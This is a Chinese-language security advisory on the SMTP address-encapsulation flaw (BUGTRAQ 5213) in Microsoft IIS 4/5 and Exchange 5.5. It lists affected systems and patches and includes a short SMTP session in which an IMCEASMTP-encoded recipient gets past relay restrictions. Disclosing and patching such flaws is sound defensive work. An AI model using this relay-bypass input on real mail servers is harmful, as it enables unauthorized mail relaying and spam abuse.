|
|
Microsoft IIS SMTP服务封装SMTP地址漏洞
发布时间:2002-07-15
更新时间:2002-07-15
严重程度:中
威胁程度:服务器信息泄露
错误类型:意外情况处置错误
利用方式:服务器模式
BUGTRAQ ID:5213
受影响系统Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
Microsoft IIS 4.0
+ Cisco Building Broadband Service Manager 5.0
+ Cisco Call Manager 1.0
+ Cisco Call Manager 2.0
+ Cisco Call Manager 3.0
+ Cisco ICS 7750
+ Cisco IP/VC 3540
+ Cisco Unity Server 2.0
+ Cisco Unity Server 2.2
+ Cisco Unity Server 2.3
+ Cisco Unity Server 2.4
+ Cisco uOne 1.0
+ Cisco uOne 2.0
+ Cisco uOne 3.0
+ Cisco uOne 4.0
+ Microsoft BackOffice 4.0
+ Microsoft BackOffice 4.5
+ Microsoft Windows NT 4.0 Option Pack
Microsoft IIS 5.0
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
+ Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP2 详细描述
Microsoft Exchange 5.5和SMTP服务是IIS包含程序,其中存在封装SMTP地址漏洞。
此漏洞最先报告在MS99-027中,并报告影响Exchange Server 5.5,Microsoft发布的补丁只针对Exchange Server 5.5,不过此漏洞也包含在IIS 4,5字带的SMTP服务,这些IIS SMTP服务Microsoft没有包含补丁。
测试代码
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
解决方案
补丁下载:
Microsoft IIS 4.0:
Microsoft IIS 5.0:
Microsoft Exchange Server 5.5 SP2:
Microsoft Patch psp2imca.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imca.zip
Microsoft Patch psp2imci.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imci.zip
Microsoft Exchange Server 5.5 SP1:
Microsoft Exchange Server 5.5:
相关信息
参考:http://online.securityfocus.com/archive/1/281914
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS99-027.asp
|
